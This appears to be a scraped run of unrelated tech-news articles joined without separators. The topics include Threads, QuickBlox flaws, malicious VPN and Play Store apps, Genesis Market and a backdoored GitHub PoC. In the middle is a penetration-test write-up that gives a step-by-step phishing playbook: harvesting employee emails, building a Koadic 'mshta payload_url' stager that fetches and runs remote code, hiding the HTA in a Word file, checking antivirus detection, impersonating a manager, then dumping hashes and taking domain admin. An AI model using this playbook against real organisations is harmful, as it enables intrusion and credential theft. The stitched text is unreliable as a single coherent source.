Some of the best phones on the market come with all sorts of quirks. Did you know that Google provides its phones like the Pixel 7 Pro with a free VPN service in some regions? And it’s such a good thing that it does, because curiosity has led all of us to questionable destinations at a point.
But one of the cooler things about VPNs, beyond the extra layer of security and anonymity, is that you can also use it to get access to things that others don’t want you to see. Like region-exclusive Netflix shows or entirely new apps and games.
Such as the recently launched Twitter Threads, which has been blowing up in the last week or so. Well, outside of the EU at least, because these “law” things aren’t letting Europeans hop on the latest theands (no I’m not sorry for that one). Yes, even with a VPN on: it won’t work.
And this is how Threads looks, for all of the EU residents.
Because, of course, a lot of online users already tried a VPN service to get over the barrier. Why would they do that? Well, simple really, it is because:
The platform is still fresh, so getting tons of new followers is very, very easy. And that is important, because those carry over to Instagram too, which ultimately means that you may get quick access to a boost in popularity.
Threads is doing something genius with its marketing: upon signing up to the platform, you get assigned a sequential number. And with this being an internet and all, people turned “having a cool number” it into a fashion statement.
And if that last statement doesn’t send dystopian chills down your spine, I don’t know what will.
Meta, however, is “dedicated to following EU regulations”. The app is smart enough to check more than your signal’s geolocation, so it can prevent you from logging in and taking part in the fun. Some users have managed to log in, but they were not allowed to do anything, so let’s hope that at least they got a cool number assigned for all of their troubles.
The situation really isn’t that complicated: your Meta account connects your Threads account with your Facebook and Instagram accounts. If you’ve had previous activity on there, Meta is probably aware of your estimated (or precise) location.
In other words, you suddenly popping up in LA after spending years in Italy probably isn’t legit.
Even if Meta says it’s dedicated to the idea of bringing Threads over to the EU, let’s not forget that the goal is to harvest more of that tasty user data. But as long as the EU keeps penalizing such nefarious plots through hefty fines, you might be wiser to not hold your breath for Threads.
Researchers found the popular chat service QuickBlox exhibiting numerous security flaws. Exploiting the QuickBlox framework vulnerabilities could allow an adversary to access the users’ data from the apps’ databases. QuickBlox patched the flaw with the latest firmware release, urging users to update their systems at the earliest.
QuickBlox Framework Vulnerabilities Risked Users’ Data
According to a recent report from Check Point Research, their researchers and the Claroty Team82 team discovered numerous vulnerabilities in the QuickBlox framework.
QuickBlox is a dedicated chat and video communication service for IoT devices like telemedicine, finance, and other such mobile apps. The service boasts a considerable clientele, serving millions of customers. It also means that any vulnerabilities in the service may risk the security of millions of users.
That’s what the researchers highlighted in their post. Specifically, they noticed secret tokens and passwords stored within the app and insecure QuickBlox API design. Exploiting the vulnerabilities could let an adversary perform various malicious actions.
For instance, the researchers analyzed an Israeli-based intercom app Rozcom. They then exploited the QuickBlox framework vulnerabilities to take over the target intercom devices, access cameras and microphones, wiretap the devices’ feed, and manage door openings.
Likewise, they analyzed a popular telemedicine service, which already had some vulnerabilities. Consequently, combining the app’s issues with QuickBlox flaws allowed the researchers to access the app’s user database, including patients’ personal data, medical history, chat history with the doctors, and medical records. Besides, the flaws also allowed impersonating doctors and chatting with patients in real time without raising alarms.
In their post, the researchers have also shared the proof-of-concept exploits against the apps running QuickBlox API and SDK.
QuickBlox Patched The Flaws
Upon discovering the vulnerabilities, the researchers reported the matter to QuickBlox officials who promptly patched the flaws. Check Point Research confirmed in its post that the vendors have designed a new API and a new secure architecture for the service.
Hence now, all service providers using the QuickBlox framework must update their apps with the latest QuickBlox release immediately to receive the patches.
YouTube Music introduced podcasts to its platform in April, initially limited to US listeners. However, the company is now rolling out this feature to more countries, allowing a broader audience to enjoy their favorite podcasts through the platform.
According to 9to5Google, the popular streaming platform has extended its podcast feature to listeners in Brazil and Canada. While there has been no official announcement yet, YouTube Music had previously stated that it planned to expand the podcast support to other countries shortly after its introduction in the US.
With the podcast feature, YouTube Music allows users to easily find and listen to podcasts by searching for specific shows or exploring various categories. The platform also offers personalized recommendations based on individual listening history, making it simple to discover new podcast content.
The podcasts feature now comes with a redesigned user experience that includes podcasts as part of the mood filters on the Home page. Alongside the other five mood filters, such as Keep listening and Recommend episodes, the “Podcasts” option will appear. Upon selection, users will be presented with a dedicated feed featuring categories like Gaming, True Crime, Society & Culture, Comedy, etc.
In the Library tab, podcasts now join the filter for Playlists, Songs, Albums, and Artists. Users can create an Auto playlist for “New Episodes” from their subscribed shows and access a collection of previously saved episodes for later listening. Subscribed podcasts will be conveniently organized within the Library alongside other music content.
The Now Playing screen offers several useful features, including a 10-second rewind and 30-second forward option, playback speed adjustment, sleep timer, and access to show details.
Notably, offline and background playback is available to all users, regardless of whether they have a YouTube Premium subscription. However, it is important to note that only podcasts or channels that have uploaded video versions of episodes will be accessible within the YouTube Music platform.
Black Box Penetration Testing to the organization is from an external point of view and tests an external network with zero information.
The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide.
As such, asides, from the company name, we were given “ZERO” information to perform external black-box penetration Testing.
This black-box external penetration Testing Performing with by a client called (Hackme)
OSINT 101
We kicked off with some Open Source Intelligence (OSINT) 101 :).
Using quite a few open-source intelligence tools, we obtained publicly available documents relating to the organization using Black-box Penetration Testing methods.
With Google Dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx”.
Of course, our aim was not to tirelessly search for documents.
Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint, and Excel). One can also useFOCA for this.
From this, I noticed that employees’ emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e.[email protected].
Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:
site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.
By hacking a script to automate the process, we copied out the first names, last names, and the roles of the current employees of Hackme.
A tiring approach is to manually crawl through the Google pages in search of these names and roles or one could also useGoogleScraper:
Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.
then using your favorite word processor (word merge, notepad++, etc) or some good scriptural skills, merge the firstname + lastname – to form your email list.
Feed our Target list a Payload
Since we are simulating Black-box Penetration Testing, we decided (just like what an attacker would do) to gain code execution using malicious payloads.
As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is a common practice for some file types/extensions to be blocked by the organization’s email filters – to limit exposure to risk.
What made it really stand out asides from the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz, and a lot more.
So we ran Koadic and set the necessary variables – using the “stager/js/mshta “ module (serves payloads in memory using MSHTA.exe HTML Applications).
The result was a spawn of our HTA payload URL as evidenced in the screenshot above.
However, we need our targets to execute our payload as “mshta payload_url“.
In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC.
Now we need to get this payload past our victim’s numerous defenses.
Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.
Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group has this implemented in Demiguise.
So here is our final payload saved as a .hta file.
The next step typically is to send our .hta payload as an embedded OLE object.
The intended attack scenario was:
Send a Microsoft Word document with our .hta payload embedded as an OLE object.
Get the user to open the Word document and the embedded OLE object.
This spawns a new process and we get shell access to our victim’s PC.
Now we get to the interesting part, we need our victim to open the Microsoft Word document and our payload.
To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.
…and more recon
We need to know more about Hackme – specifically the culture and employees’ behavior.
The question we kept asking ourselves was “what would interest the employees?”
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of Hackme on Glassdoor, we found some common themes:
…and more recon
We need to know more about the target organization’s environment – specifically employees.
The question we kept asking ourselves was – what would interest the employees?
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of the target organization on Glassdoor, we found some common themes:
Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
Employees love the organization because they get free lunches.
But Wait!
As the old saying goes, the fastest way to a man’s heart is through his stomach.
So what better way to get the employees to open our payload-embedded Word document?
Send them an email – telling them there is a change in the FREE LUNCH menu starting tomorrow.
Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with a Hackme email signature while observing the organization’s email culture.
Now, how do we make our email more believable? By sending an email to the Customer Service/Help Desk with a service request and observing the email signature in the response.
… recon again???
We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager, or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.
We are halfway through sending our payload now. Have some patience and read on…
It’s time to send our payload
From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.
I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.
Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package.
We changed the icon to a Microsoft Word icon and also the caption to reflect our message.
Change the icon to Microsoft Word’s icon and also, change the caption to reflect your message.
Don’t Forget the Anti-virus!!!
To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.
AV Scan of our .hta payload (0 detections)
It’s Time to Send our Email
If the target org does not have SPF, DKIM, and DMARC configured, one can easily spoof the HR Manager, Logistic Manager, or Admin Manager’s email address.
In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.
Let the shells in
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
What next?
The rest they often say is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems, and even became domain admins, etc.
In conclusion
All in all, this was a very fun engagement. Whilst it may take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level.
It can be fairly easy for one to gain access by exploiting the human factor.
“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.
The moral of the exercise is: Recon, recon, and more recon – for a wise man once said
“Give me six hours to chop down a tree and I will spend the first four sharpening the axe“.
Credits:
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.
The app under discussion, Swing VPN – Fast VPN Proxy, was uncovered as a DDoS botnet by a cybersecurity researcher named “Lecromee” on June 4th, 2023.
On June 4th, 2023, cybersecurity researcher “Lecromee” uncovered alarming information about the popular VPN app, Swing VPN – Fast VPN Proxy. Developed by Limestone Software Solutions for Android and iOS platforms, Swing VPN’s Android version was found to be operating as a dangerous DDoS botnet, posing significant risks to its unsuspecting users.
Hackread.com, first reported on the issue on June 21, 2023, after Lecromee’s investigation raised serious concerns. The findings indicated that the app, which claimed to offer legitimate VPN services, was harbouring malicious intent and could carry out distributed denial of service (DDoS) attacks.
Shortly after the report was published, Hackread.com was contacted by Google on June 22, confirming the veracity of the claims. In response to the alarming discovery, Google took immediate action and swiftly removed Swing VPN’s Android app with over 5 million installs from the Google Play Store.
It is worth noting that another app from Limestone Software Solutions, called Hotspot for Swing VPN, has also been removed from the app store along with Swing VPN – Fast VPN Proxy.
A Google spokesperson emphasized the company’s commitment to user safety and security, stating,
“The app was removed from Google Play on June 22, and the developer has been banned. Users are also protected by Google Play Protect, which warns users of apps known to exhibit malicious behaviour on Android devices with Google Play Services, even when those apps come from other sources.”
Google
The removal of Swing VPN – Fast VPN Proxy app from the official app store highlights the ongoing challenges faced by platforms like Google Play in combating malicious apps. Unfortunately, such occurrences are not uncommon, and Google continuously works to enhance its security measures to protect users.
However, users themselves must remain vigilant and cautious about the apps they download and grant permission to. Cybersecurity experts recommend the following best practices to stay safe:
Research Before Download: Always research the app and its developer before downloading it. Check user reviews, ratings, and previous security incidents, if any.
Update Regularly: Keep all apps, including VPNs, up-to-date with the latest versions and security patches to minimize vulnerabilities.
Verify Permissions: Be cautious about granting excessive permissions to apps. Review and understand the permissions an app requests before installation.
Use Reputable Sources: Stick to trusted app stores like Google Play and Apple’s App Store to minimize the risk of downloading malicious apps.
Antivirus Software: Install reputable antivirus software on your device to detect and block potential threats.
As the digital landscape continues to evolve, staying informed and vigilant against cyber threats is crucial. The Swing VPN incident serves as a reminder that even seemingly legitimate apps can harbour dangerous intentions, making it essential for users to prioritize their online safety.
If you suspect any app or service is engaging in malicious behaviour, report it to the respective app store or platform immediately. By working together, users, researchers, and tech companies can create a safer digital environment for everyone.
If you are an Android user, you can follow this link to report an app or an app developer. For iOS users, this link can be helpful.
The apparent successful sale took place despite the FBI’s takedown and seizure of the clearnet domain and infrastructure of Genesis Market in April 2023.
The criminal group responsible for Genesis Market, a prominent Dark Web platform known for facilitating cyber fraud, announced that the platform has been sold to an anonymous buyer.
The sale comes several months after U.S. authorities disrupted the platform, seizing some of its domains and adding it to the sanctions list. The move raises concerns about the potential revival of illicit activities and the evolving nature of cybercrime.
As we previously reported, in late June, Genesis Market was advertised to be available for sale on a hacker forum along with its source code and database. The operators’ attempt to sell the marketplace was met with suspicion in the cybersecurity community with researchers speculating that the advertisements were likely part of an FBI honeypot operation.
The news of Genesis Market’s sale emerged when an account named GenesisStore, which had previously associated itself with the platform’s administrators, posted an announcement on the Russian-language Exploit Forum.
According to The Record’s report, the post stated that a buyer had been found, and a deposit had been made, with the store set to be transferred to the new owner next month. Notably, the sale does not include current user accounts.
Earlier this year, the FBI-led operation successfully seized Genesis Market‘s clear web domains and made several arrests of individuals globally who had been involved in fraudulent activities through the platform.
The operation also led to the identification and location of the platform’s backend servers, resulting in the acquisition of valuable information about approximately 59,000 user accounts.
The sale of Genesis Market, despite its tarnished reputation, has raised eyebrows within the cybersecurity community. Some experts speculate that the operators themselves orchestrated the sale to facilitate rebranding and disconnect from the sanctioned entity. Doubts have been cast on the viability of the sale, given the platform’s diminished standing and the legal consequences that potential buyers might face.
The seized clearnet domain of the Genesis Market (Image: Hackread.com)
Law enforcement agencies worldwide are likely to closely monitor the developments surrounding the sale of Genesis Market, ensuring that any potential resurgence of criminal activities is promptly addressed which is another disadvantage the new buyer of the marketplace will have to face.
Nevertheless, the cybersecurity community remains vigilant in combating cybercrime and safeguarding the digital landscape and it would be far from it for them to let a defunct marketplace rise back into power.
Threads, the Twitter rival from Meta’s Instagram that appeared out of nowhere to wind up with 100 million subscribers after its first five days, is moving faster than expected to add a feature found on Twitter. Originally, Instagram CEO Adam Mosseri said that Direct Messaging for Threads would not be coming soon. Direct Messaging, or DMs, are messages sent privately from one subscriber to another subscriber on the same platform.
Now it appears that Threads might be offering DMs sooner than expected. Business Insider has obtained a leaked internal memo from Instagram saying that DMs would be “coming soon” to Threads along with some other features. While the report was blocked by a paywall, social media analyst Matt Navarra posted on Twitter (ironically) that the memo does mention new capabilities that are heading to Threads.
This is actually good news for Threads since adding DMs mean that anyone on the platform who wants to speak with another subscriber privately will be able to do so without leaving Threads and heading to another social media app. What made Threads decide to move up the timeline for DMs? There is speculation that important Threads creators got the ear of Instagram executives and stressed the importance of launching it for the platform ahead of other features.
Social media analyst Navarra says DMs are coming soon to Threads along with other features
Instagram CEO Mosseri also said that improved search, trends, and topics are also coming soon for Threads. In addition, Threads has promised support for multiple accounts, a feed in chronological order that would show only people you know, support for hashtags, and the ability to edit posts. Subscribers also want the option of deleting their accounts without having to delete their Instagram account. And eventually, once Threads becomes more than just a flash-in-the-pan, you’ll see Instagram look to monetize the platform by selling ads.
Threads is off to a good start putting pressure on Elon Musk and his team to attract more advertisers and turn Twitter cash flow positive. As for Threads, we don’t know when DMs and all of the other aforementioned features will come to the site but for those who are backing it, these additions can’t come soon enough. And it seems that Instagram’s Mosseri is smart enough to understand that he can turn the heat up on Twitter by launching these features earlier than expected.
Even though Google Play Protect scans apps in the Play Store before you install them to make sure the apps you’re adding to your phone are free of any malware. It also scans your phone to make sure that apps you sideloaded (installed from a third-party app storefront) didn’t infect your Android handset. However, there are other ways besides offering malware-laden apps to steal your personal data.
Two Play Store apps with 1.5 million installs lied about not collecting user data
According to security firm Pradeo (via BleepingComputer), two apps from the Play Store that have been installed more than 1.5 million times, collected more user data than needed to allow the apps to do the jobs they were supposed to do. The two apps came from the same developer, wang tom. One of the titles is “File Recovery and Data Recovery,” which shows up as “com.spot.music.filedate” on devices and was installed at least 1 million times. The other app, installed at least 500,000 times, is titled “File Manager and shows up on devices as “com.file.box.master.gkd.”
These two apps, with a total of over 1.5 million Play Store installs, stole user data
The two apps were discovered by Pradeo and their listings in the Play Store say that they do not collect any user data, which was an out-and-out lie. The apps also violated the EU’s General Data Protection Regulation (GDPR) by stating that any personal data collected by the app could not be deleted. The security firm found that personal data was stolen by the apps and sent to China. The data stolen includes:
Users’ contact lists from the device itself and from all connected accounts such as email, social networks.
Media compiled in the application: Pictures, audio and video contents.
Real time user location.
Mobile country code.
Network provider name.
Network code of the SIM provider.
Operating system version number, which can lead to vulnerable system exploit like the Pegasus spyware did.
To make sure that the malicious apps were launched, the extra permissions that the apps received allowed them to force a device to restart. When the phone restarted, the apps launched and were able to do their malicious tasks even without user interaction. Both apps also hid their icons from the home screen making them almost impossible to delete from an infected device.
In a statement, Google confirmed that the two apps have been deleted from the Play Store and said, “These apps have been removed from Google Play. Google Play Protect protects users from apps known to contain this malware on Android devices with Google Play Services, even when those apps come from other sources outside of Play.” Even though Google did remove the apps from the Play Store, if they are still on your device they can still cause trouble. Delete them immediately!
Security firm Pradeo lists some recommendations
Pradeo did make some recommendations, some of which we have discussed with you before:
Do not download applications that do not have any reviews while thousands of users.
Read reviews when there are any, they usually reflect the application’s true nature.
Always carefully read permissions before accepting them.
Here are some more tips that we’ve learned over the years. If running a certain app makes your phone run hot or drains your battery, it’s a good bet that the app is compromised. A rogue app with adware could be playing ads in the background to run up revenue.
The apps lied in the Play Store and also violated GDPR rules about user data
And we really agree with Pradeo’s hint to “Read reviews when there are any, they usually reflect the application’s true nature.” We’ve said that for years. If any red flags pop up in the review of an app, don’t install it, keep going, and never look back. The simple rule is that you should look at the reviews for an app from a developer that you’ve never heard of. And even then, if you’re unsure, Google the name of the app and see what comes up.
The bad news keeps piling on for Twitter owner Elon Musk. His $44 billion investment in Twitter is just not working out yet and Mark Zuckerberg’s Meta is signing up subscribers for newly minted Twitter rival Threads at a rapid pace. Threads has a huge advantage because of Thread’s Instagram integration. New Threads subscribers must have an Instagram account to join; Instagram has over 1 billion monthly active users and a large number of that platform’s subscribers will open a Threads account, a process that is quick and easy to do.
Today, Musk revealed some more bad news in the form of a tweet that said, “We’re still negative cash flow, due to ~50% drop in advertising revenue plus heavy debt load. Need to reach positive cash flow before we have the luxury of anything else.” Negative cash flow means exactly what it sounds like. More cash is leaving the business than is coming into it. On the other hand, he also said yesterday that it “Looks like this platform may see all-time high device user seconds usage this week.”
Twitter owner Elon Musk passes along some bad news
Advertisers might not be happy with the mess that Musk has created at Twitter as he monetized verification checkmarks and kept reversing company policy. He also put a cap on the number of tweets users can read in a day only to raise that cap hours later. It is this kind of instability at Twitter that has advertisers pulling back. Back in April, Musk said that advertisers were coming back and that cash flow would soon turn positive. So far, it hasn’t. At the time, Musk said, “Almost all of them have either come back or said they’re coming back.”
According to app research firm Sensor Tower, during a two-month period earlier this year, Twitter’s advertising revenue plunged by 89% to $7.6 million. Compare that figure to the $71 million that the top ten Twitter advertisers spent on ads from September to October of last year just before Musk’s acquisition of the platform.
The backdoor dropped in the scam had the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents.
Cybersecurity researchers have uncovered a deceptive trend within the security community—a proof of concept (PoC) repository on GitHub that appears to address vulnerabilities but actually contains a hidden backdoor. The discovery by the Uptycs threat research team has raised concerns among the security research community.
PoCs are typically used by researchers to identify potential vulnerabilities through harmless testing. However, this malicious PoC operates as a downloader, disguising its activities as a kernel-level process while silently executing a Linux bash script.
The backdoor has the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents. Moreover, by adding their SSH key to the authorized_keys file, an attacker can achieve full control over a targeted system.
One of the fake profiles on GitHub that was used in spreading malicious PoCs (Image credit: Uptycs)
Here, Hackread.com can exclusively confirm that the image used in the above GitHub profile belongs to Shahriyar Hamid oghlu Mammadyarov, known internationally as Shakhriyar Mamedyarov, who is an Azerbaijani chess grandmaster. The profile image was stolen from a blog post and a YouTube video published by the popular Chess-related YouTube channel, ChessBase India.
The backdoor was discovered during the testing of PoCs for various Common Vulnerabilities and Exposures (CVEs) when the Uptycs team encountered a PoC claiming to address the critical vulnerability CVE-2023-35829. However, they detected several unusual activities that raised suspicions about the PoC’s legitimacy.
The suspicious behaviours encompassed unexpected network connections, abnormal data transfers, and unauthorized attempts to access the system. Further investigation revealed the significance of the “aclocal.m4” file, which required additional analysis.
The primary function of the binary file contains an interesting string, “kworker,” which plays a crucial role in the deception. The code checks if the binary is named “kworker” and performs specific actions accordingly, establishing backdoor persistence through file manipulation.
In their report, Nischay Hegde and Siddartha Malladi of the Uptycs Threat Research team wrote that the PoC used forking to create a new process, obscuring the original command line parameters. The parent process then executes the “curl_func()” function, which downloads a URL containing a bash script. The script is executed if the curl request succeeds.
The fake PoC is a copy of a legitimate exploit for another Linux kernel vulnerability, CVE-2022-34918. It creates the illusion of being a root shell, exploiting differences in user namespaces to deceive users. However, the granted privileges are limited to the “/bin/bash” shell within a specific namespace.
Using Uptycs Extended Detection and Response (XDR), the binary’s behaviour was identified primarily as a downloader. It retrieves a script from a remote source and executes it on the compromised system. The downloaded script accesses the “/etc/passwd” file and modifies the “~/.ssh/authorized_keys” file to grant unauthorized access and exfiltrates data using a specific URL.
This incident is not isolated; just last month, it was reported that several fake accounts on GitHub and Twitter were spreading malware in malicious PoC that infected both Windows- and Linux-based systems.
At the time of writing, ChriSander22’s repositories were taken down. Although the malicious PoC has also been removed from GitHub, it was widely shared, resulting in significant engagement before its true nature was exposed. Those who executed the PoC are at high risk of data compromise.
Therefore, it is crucial to take immediate action, including removing unauthorized SSH keys, deleting the “kworker” file, removing the kworker path from the “bashrc” file, and checking for potential threats in “/tmp/.iCE-unix.pid.”
Differentiating between legitimate and malicious PoCs can be challenging and security researchers are encouraged to adopt safe practices, such as conducting testing in isolated environments like virtual machines, to enhance protection against these evolving cybersecurity risks.
